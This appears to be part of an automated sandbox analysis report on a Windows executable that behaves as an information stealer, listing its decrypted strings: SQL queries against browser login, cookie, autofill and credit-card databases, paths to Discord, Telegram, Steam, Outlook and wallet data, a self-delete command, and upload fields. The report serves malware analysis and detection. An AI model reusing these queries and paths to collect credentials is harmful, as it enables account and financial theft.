                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CopyFileA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: VirtualProtect
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetLastError
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: lstrcpynA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: MultiByteToWideChar
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GlobalFree
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: WideCharToMultiByte
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GlobalAlloc
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: OpenProcess
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: TerminateProcess
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetCurrentProcessId
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: gdiplus.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: ole32.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: bcrypt.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: wininet.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: shlwapi.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: shell32.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: psapi.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: rstrtmgr.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CreateCompatibleBitmap
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SelectObject
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: BitBlt
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: DeleteObject
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CreateCompatibleDC
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GdipGetImageEncodersSize
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GdipGetImageEncoders
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GdiplusStartup
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GdiplusShutdown
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GdipSaveImageToStream
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GdipDisposeImage
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GdipFree
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetHGlobalFromStream
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CreateStreamOnHGlobal
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CoUninitialize
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CoInitialize
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CoCreateInstance
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: BCryptDecrypt
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: BCryptSetProperty
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: BCryptDestroyKey
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetWindowRect
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetDesktopWindow
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetDC
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CloseWindow
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: wsprintfA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: EnumDisplayDevicesA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetKeyboardLayoutList
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CharToOemW
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: wsprintfW
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: RegQueryValueExA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: RegEnumKeyExA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: RegOpenKeyExA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: RegCloseKey
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: RegEnumValueA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CryptBinaryToStringA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CryptUnprotectData
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SHGetFolderPathA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: ShellExecuteExA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: InternetOpenUrlA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: InternetConnectA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: InternetCloseHandle
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: InternetOpenA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: HttpSendRequestA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: HttpOpenRequestA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: InternetReadFile
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: InternetCrackUrlA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: StrCmpCA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: StrStrA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: StrCmpCW
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: PathMatchSpecA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: GetModuleFileNameExA
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: RmStartSession
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: RmRegisterResources
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: RmGetList
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: RmEndSession
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: sqlite3_open
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: sqlite3_prepare_v2
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: sqlite3_step
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: sqlite3_column_text
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: sqlite3_finalize
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: sqlite3_close
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: sqlite3_column_bytes
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: sqlite3_column_blob
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: encrypted_key
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: PATH
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: NSS_Init
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: NSS_Shutdown
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: PK11_GetInternalKeySlot
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: PK11_FreeSlot
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: PK11_Authenticate
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: PK11SDR_Decrypt
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: C:\ProgramData\
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: browser:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: profile:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: url:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: login:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: password:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Opera
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: OperaGX
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Network
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: cookies
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: .txt
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: TRUE
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: FALSE
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: autofill
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SELECT name, value FROM autofill
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: history
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: cc
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: name:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: month:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: year:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: card:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Cookies
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Login Data
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Web Data
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: History
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: logins.json
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: formSubmitURL
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: usernameField
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: encryptedUsername
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: encryptedPassword
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: guid
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: cookies.sqlite
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: formhistory.sqlite
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: places.sqlite
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: plugins
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Local Extension Settings
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Sync Extension Settings
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: IndexedDB
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Opera Stable
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Opera GX Stable
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: CURRENT
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: chrome-extension_
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: _0.indexeddb.leveldb
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Local State
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: profiles.ini
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: chrome
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: opera
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: firefox
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: wallets
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: %08lX%04lX%lu
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: ProductName
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: x32
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: x64
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: ProcessorNameString
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: DisplayName
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: DisplayVersion
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Network Info:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - IP: IP?
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - Country: ISO?
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: System Summary:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - HWID:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - OS:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - Architecture:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - UserName:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - Computer Name:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - Local Time:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - UTC:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - Language:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - Keyboards:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - Laptop:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - Running Path:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - CPU:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - Threads:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - Cores:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - RAM:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - Display Resolution:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: - GPU:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: User Agents:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Installed Apps:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: All Users:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Current User:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Process List:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: system_info.txt
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: freebl3.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: mozglue.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: msvcp140.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: nss3.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: softokn3.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: vcruntime140.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: \Temp\
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: .exe
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: runas
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: open
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: /c start
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: %DESKTOP%
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: %APPDATA%
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: %LOCALAPPDATA%
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: %USERPROFILE%
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: %DOCUMENTS%
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: %PROGRAMFILES%
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: %PROGRAMFILES_86%
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: %RECENT%
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: *.lnk
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: files
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: \discord\
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: \Local Storage\leveldb
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: \Telegram Desktop\
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: key_datas
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: D877F783D5D3EF8C*
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: map*
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: A7FDF864FBC10B77*
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: A92DAA6EA6F891F2*
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: F8806DD0C461824F*
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Telegram
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Tox
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: *.tox
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: *.ini
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Password
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: 00000001
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: 00000002
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: 00000003
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: 00000004
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: \Outlook\accounts.txt
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Pidgin
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: \.purple\
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: accounts.xml
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: dQw4w9WgXcQ
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: token:
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Software\Valve\Steam
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: SteamPath
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: \config\
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: ssfn*
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: config.vdf
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: DialogConfig.vdf
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: libraryfolders.vdf
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: loginusers.vdf
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: \Steam\
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: sqlite3.dll
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: browsers
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: done
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: soft
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: \Discord\tokens.txt
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: https
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: POST
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: HTTP/1.1
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: Content-Disposition: form-data; name="
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: hwid
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: build
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: token
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: file_name
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: file
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: message
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                    Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpackString decryptor: screenshot.jpg
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040A2B0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_0040A2B0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00419030 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00419030
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040C920 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C920
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0040A210
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_004072A0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004072A0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFBB040 BCryptGenRandom,SystemFunction036,0_2_6CFBB040

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeUnpacked PE file: 0.2.b4s45TboUL.exe.400000.1.unpack
                    Source: b4s45TboUL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 87.106.236.48:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: Binary string: my_library.pdbU source: b4s45TboUL.exe, 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmp, b4s45TboUL.exe, 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp
